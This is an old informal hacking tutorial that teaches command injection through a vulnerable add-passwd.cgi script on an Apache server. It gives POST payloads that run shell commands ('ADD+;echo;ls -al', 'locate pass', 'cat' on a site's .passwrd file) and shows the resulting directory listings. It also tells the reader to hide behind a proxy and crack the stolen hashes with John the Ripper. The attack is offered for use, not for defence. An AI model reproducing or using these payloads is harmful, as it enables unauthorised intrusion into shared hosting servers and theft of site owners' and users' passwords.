Last article Table of contents Next article

add-passwd.cgi by Energy

open ur httpdebagger on the accessdivre (it's in extra tools) 
and we will work on this 1 together 
when u got somthing like that it meens that u have a path to the server not only this site
(to the hole server with all the site's in it) 
first u have to understand this is unix or linux op sys 
server info: 
HTTP/1.0 200 OK 
Date: Fri, 28 Mar 2003 12:47:54 GMT 
Server: Apache/1.3.26 (Unix) PHP/4.1.1 
Content-Type: text/plain 
X-Cache: MISS from 
Proxy-Connection: close 
so we will start on some basics commands 
dir /all=ls -al 
to move up a directory=ls-al ../ 
and so on = ls -al ../../../ as meny as u want 
(i know u dont understand just listen for now) 
now u have to setup ur httpdebagger so go in and 
mark post data on the r side 
mark post data on the buttom to ur left 
type on the http server. 
mark the set proxy and put there a good proxy 
in the mode mark post 
now when u marked the post data u see a window opened type there 
ADD+;echo;ls -al 
and connect!!! 
total 40 
drwxr-sr-x 2 bshaw www-data 4096 Jan 29 2002 . 
drwxr-sr-x 7 bshaw www-data 4096 Mar 26 15:33 .. 
-rwxr-xr-x 1 bshaw www-data 7337 Jan 25 2002 add-passwd.cgi 
-rwxr-xr-x 1 bshaw www-data 20706 Jan 29 2002 w_mem.cgi 
(frst it meens that u can use cgi-bin/w_mem.cgi sploit") 
now u see the first directoris on the server 
now post 
ADD+;echo;locate pass 
(the locat command u can cheng the word u are looking for 
like .htpasswd or pass or passwords or access .....) 
ok now u connect and u see meny things so al just give u a hint 
try to look for the name of the site u are looking for and in the same line
look for 1 of the words i said!!! 
in this server i see meny names so al pic 1 
it's for the site as u see a littel bit down 
ok so now we have to use the cut command and this will show you the content of the file
so in the post data you type 
ADD+;echo;cat /web/sites/goddess/epoch/.passwrd 
connect and there u have it all the site's passes  
now as u can see the passes are encripted so... 
u have to decript with JTR  
bye bye hope u enjoy